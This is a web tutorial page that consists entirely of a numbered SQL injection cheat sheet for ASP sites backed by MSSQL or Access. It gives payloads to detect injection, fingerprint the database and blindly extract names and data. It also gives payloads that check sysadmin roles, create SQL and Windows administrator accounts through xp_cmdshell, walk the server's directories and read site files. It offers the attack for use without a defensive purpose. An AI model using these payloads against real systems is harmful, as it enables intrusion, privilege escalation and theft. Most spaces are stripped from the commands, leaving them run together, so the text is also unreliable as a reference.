Home>Network programming tutorial>ASP tutorial

Comprehensive understanding of ASP injection skills

Author:Eve Cole Update Time:2025-06-10 22:16:01

The code copy is as follows:

1. Determine whether there is injection

;and1=1

;and1=2

2. Preliminary judgment on whether it is mssql

;anduser>0

3. Injection parameters are characters

'and[query condition]and''='

4. No filtering parameters during search

'and[query condition]and'%25'='

5.Judge database system

;and(selectcount(*)fromsysobjects)>0mssql

;and(selectcount(*)frommsysobjects)>0access

6. Guess the database

;and(SelectCount(*)from[database name])>0

7. Guess the field

;and(SelectCount(field name) from database name)>0

8. Guess the record length in the field

;and(selecttop1len(field name) from database name)>0

9.(1) Guess the ascii value of the field (access)

;and(selecttop1asc(mid(field name, 1, 1)) from database name)>0

(2) Guess the ascii value of the field (mssql)

;and(selecttop1unicode(substring(field name, 1, 1)) from database name)>0

10. Test permission structure (mssql)

;and1=(SELECTIS_SRVROLEMEMBER('sysadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('serveradmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('setupadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('securityadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('diskadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('bulkadmin'));--

;and1=(SELECTIS_MEMBER('db_owner'));--

11. Add mssql and system account

;execmaster.dbo.sp_addloginusername;--

;execmaster.dbo.sp_passwordnull,username,password;-

;execmaster.dbo.sp_addsrvrolemembersysadminusername;--

;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--

;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--

;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--

12.(1)Transfer the directory

;createtabledirs(pathsvarchar(100),idint)

;insertdirsexecmaster.dbo.xp_dirtree'c:/'

;and(selecttop1pathsfromdirs)>0

;and(selecttop1pathsfromdirswherepathsnotin('paths obtained from the previous step'))>)

(2) Traverse the directory

;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));-

;inserttempexecmaster.dbo.xp_availablemedia;-get all current drives

;insertintotemp(id)execmaster.dbo.xp_subdirs'c:/';--Get subdirectory list

;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:/';--Get the directory tree structure of all subdirectories

;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:/web/index.asp';--View the content of the file

Related Articles